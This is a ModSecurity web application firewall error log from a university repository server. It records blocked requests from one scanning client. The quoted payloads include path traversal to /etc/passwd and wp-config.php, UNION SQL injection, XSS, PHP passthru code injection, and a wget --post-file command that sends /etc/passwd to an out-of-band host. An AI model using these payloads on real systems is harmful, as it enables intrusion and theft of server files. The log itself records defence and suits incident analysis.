[Tue Aug 29 11:47:01.404019 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RcCo-f0AAAjCbCEAAAAB"]
[Tue Aug 29 11:47:02.531157 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14RsCo-f0AAAjKyvAAAAAQ"]
[Tue Aug 29 11:47:03.482839 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14R8Co-f0AAAjM7CgAAAAT"]
[Tue Aug 29 11:47:05.475657 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/download"] [unique_id "ZO14ScCo-f0AAAhzvqIAAAAx"]
[Tue Aug 29 11:47:06.476664 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repository.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjM7DUAAAAT"]
[Tue Aug 29 11:47:06.476743 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repository.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjM7DUAAAAT"]
[Tue Aug 29 11:47:07.627547 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26ggebdo47asc1rc.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14S8Co-f0AAAjqDC8AAAAH"]
[Tue Aug 29 11:47:07.751154 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14S8Co-f0AAAjCbCoAAAAB"]
[Tue Aug 29 11:47:10.483474 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14TsCo-f0AAAjCbDoAAAAB"]
[Tue Aug 29 11:47:11.379864 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14T8Co-f0AAAh131oAAAAz"]
[Tue Aug 29 11:47:13.463037 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UcCo-f0AAAi@TCwAAAAM"]
[Tue Aug 29 11:47:14.399650 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14UsCo-f0AAAjZRZQAAAAS"]
[Tue Aug 29 11:47:15.433188 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14U8Co-f0AAAcsLecAAAAE"]
[Tue Aug 29 11:47:16.358282 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14VMCo-f0AAAjcHYQAAAAY"]
[Tue Aug 29 11:47:16.427868 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VMCo-f0AAAhT3@oAAAAD"]
[Tue Aug 29 11:47:18.472686 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14VsCo-f0AAAj114AAAAAa"]
[Tue Aug 29 11:47:19.558725 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14V8Co-f0AAAjcHYoAAAAY"]
[Tue Aug 29 11:47:19.578009 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAjcHYsAAAAY"]
[Tue Aug 29 11:47:22.423124 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO14WsCo-f0AAAi@TDgAAAAM"]
[Tue Aug 29 11:47:23.407041 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/index.action"] [unique_id "ZO14W8Co-f0AAAjrbHsAAAAP"]
[Tue Aug 29 11:47:25.384551 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XcCo-f0AAAjZRaYAAAAS"]
[Tue Aug 29 11:47:25.468658 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XcCo-f0AAAhui84AAAAr"]
[Tue Aug 29 11:47:26.365603 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XsCo-f0AAAhT4AwAAAAD"]
[Tue Aug 29 11:47:27.398547 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14X8Co-f0AAAhui9MAAAAr"]
[Tue Aug 29 11:47:31.475275 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14Y8Co-f0AAAi2yIgAAAAN"]
[Tue Aug 29 11:47:32.895050 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZMCo-f0AAAhl0KIAAAAi"]
[Tue Aug 29 11:47:34.553005 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14ZsCo-f0AAAjCbH4AAAAB"]
[Tue Aug 29 11:47:37.395445 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14acCo-f0AAAjKyykAAAAQ"]
[Tue Aug 29 11:47:38.396025 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14asCo-f0AAAkGCScAAAAE"]
[Tue Aug 29 11:47:39.432395 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14a8Co-f0AAAjM7FsAAAAT"]
[Tue Aug 29 11:47:40.414841 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repository.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAfECFUAAAAO"]
[Tue Aug 29 11:47:40.420379 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repository.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAfECFUAAAAO"]
[Tue Aug 29 11:47:41.411397 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repository.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAjW9GQAAAAA"]
[Tue Aug 29 11:47:41.419349 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repository.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAjW9GQAAAAA"]
[Tue Aug 29 11:47:42.380047 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAfECF0AAAAO"]
[Tue Aug 29 11:47:42.425601 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAi2yKAAAAAN"]
[Tue Aug 29 11:47:43.678852 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14b8Co-f0AAAkNPnwAAAAI"]
[Tue Aug 29 11:47:44.367454 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14cMCo-f0AAAkAL8QAAAAU"]
